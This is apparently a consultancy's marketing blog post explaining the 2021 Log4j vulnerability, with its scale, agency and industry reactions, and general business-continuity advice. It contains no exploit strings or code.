Log4j has come up all over business and technology circles lately. What is it and why the need to be concerned?
A series of critical flaws in widely used software has cybersecurity experts sounding alarms and major companies scrambling to fix the issues. On December 9, 2021, security researchers discovered a flaw in the code of a software library used for logging. More issues were discovered in the same code on the 11th.
It has been characterized by Tenable as “the single biggest, most critical vulnerability of the last decade”
Apache Log4j is a Java-based logging utility originally written by Ceki Gülcü. It is part of the Apache Logging Services, a project of the Apache Software Foundation.
The software library, Log4j, is built on a popular coding language, Java, that has widespread use in software and applications used worldwide. This flaw in Log4j is estimated to be present in over 100 million instances globally. Cybersecurity firm CheckPoint says that over 100 hacking attempts per minute are currently seeking to exploit this flaw.
At the heart of the problem with Log4j is a confusion between simple data and executable commands.
Malicious coders have been exploiting this kind of confusion forever. Layered deep in the very code your business is using and you didn’t know it was there.
How does it work?
Log4j has three main components: loggers, appenders and layouts. These three types of components work together to enable developers to log messages according to message type and level, and to control at runtime how these messages are formatted and where they are reported.
Log4j is written in Java, which means it is completely device agnostic. On the other hand, it is an open-source package. That means anybody (well, anybody with coding skills) can read the source code, spot any bugs, and contribute to improving the package.
The theory is that open-source code is safer because it has been examined by many sets of eyes, and because there is no possibility of a backdoor or some other unwanted feature hiding in the code. When the library involved is sensitive, involving encryption, it really does get serious scrutiny. But this simple log-writing module did not receive sufficient attention.
Here is a crucial point. Attacks using the vulnerability in Log4j are not aimed at consumers. A hacker who forces it to log a line of text that becomes a command is aiming to install malware on the hosting platform or a server (even at the cloud layer, servers are involved). Even containers are vulnerable. Microsoft reports that state-sponsored hackers are using it, likely to push ransomware. Apple, Cloudflare, Twitter, Valve, and other large companies have been affected. The Log4j flaw allows attackers to execute code remotely on a target computer, which could let them steal data, install malware, or take control. Exploits discovered recently include hacking systems to mine cryptocurrency. Other hackers have built malware to hijack computers for large-scale assaults on internet infrastructure, cyber researchers have found.
The vulnerability might give hackers enough of a foothold within a system to install ransomware, a type of computer virus that locks up data and systems until the attackers are paid by victims. Security company F-Secure said its analysts have observed some ransomware variants being deployed via the Log4j flaw, along with malware that is often deployed as a precursor to a ransomware strike.
Reaction and how wide spread is Log4j?
“To be clear, this vulnerability poses a severe risk,” said Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency. “Internet-facing systems as well as back-end systems could contain the vulnerability.” CISA is a federal agency in the United States under Department of Homeland Security.
CISA pushed approval for US Government branches to have all Log4j vulnerabilities resolved by Dec 24, 2021.
The FTC released a statement for private companies to comply with Log4j resolutions or fe consequences, siting Equifax data breach as an example.
Belgium’s Defense Ministry said it shut down parts of its computer network because attackers triggered vulnerability.
Internet content and asset company Akamai Technologies Inc. has tracked 10 million attempts to exploit the Log4j vulnerability per hour in the U.S. Hackers are using the vulnerability to target the retail sector more than any other, Akamai said. The technology, financial services and manufacturing industries have also been frequent targets.
Which technology suppliers are affected by the Log4j vulnerability?
Many, and the list is growing. Among them are Apple Inc., Amazon.com Inc., Cloudflare Inc., IBM, Microsoft’s Minecraft, Palo Alto Networks Inc., Twitter Inc, and many more.
In fact, if you use Software as a Service (SaaS) tools, Infrastructure as a service, Platform as a service, or any other hosted platform or service, you will be vulnerable to this exploit. This includes apps like Salesforce, Amazon Prime Services and platforms, Intuit Tax Services, and the entire Adobe Creative Suite.
This vulnerability has the potential to be catastrophic, literally “breaking the internet” due to the ease with which bad actors could exploit this flaw and undermine the platform hosting whatever applications they wish to exploit, up to and including downloading “backdoor” access while you are utilizing your streamed applications.
So, what can be done?
Remember, you are responsible for your company’s business continuity and security. Hosts and providers due their due diligence, but it is up to you to ensure business continuity and disaster recovery.
As for protecting against Log4j on the corporate owned infrastructure side, it is quite simple. There is a setting that controls whether the logging system can interpret data as code. Turning that switch off does the job. Naturally, Apache has released an update to the code module, but some researchers report that the only notable change in the update is that this switch defaults to off.
As noted, Log4j is code designed for hosted platforms, and the exploit attack affects servers. Still, your business may be affected if a hacker uses it to take down a platform and digital asset that is important to you or tries to use the resource for drive-by downloads or other malware attacks.
For digital assets that you don’t own (such as SaaS and Cloud platforms) you can protect against those attacks by performing due diligence, contacting all your vendors to determine if they are fully updated against this flaw.
The CTO Dan Rasmussen offered a bash script on LinkedIn to help you inventory your server to weed out the flaw. And here is another from Github.com.
Do your part by having a business continuity plan, use multiple platforms, take frequent snapshots. Keeping your own data, devices, and connections secured means you are unlikely to be affected by the fallout from a Log4j exploit attack. If it does happen, you require a plan and process to continue business and may need to rebuild leveraging your backed up resources, so be sure to have the required components to do so available.
This is a confusing subject. It is a vulnerability located deep in code required for hosting services and applications to work. Your common end user typically does not get involved in this level of scrutiny. However, Cloud based services and hosting has changed the game. Many businesses run without a significate technology ownership presence or assistance. Yet all are vulnerable to a security challenge that is created by Log4J. You have questions, ConaLogix has answers. Let ConaLogix guide you through these business technology issues and challenges.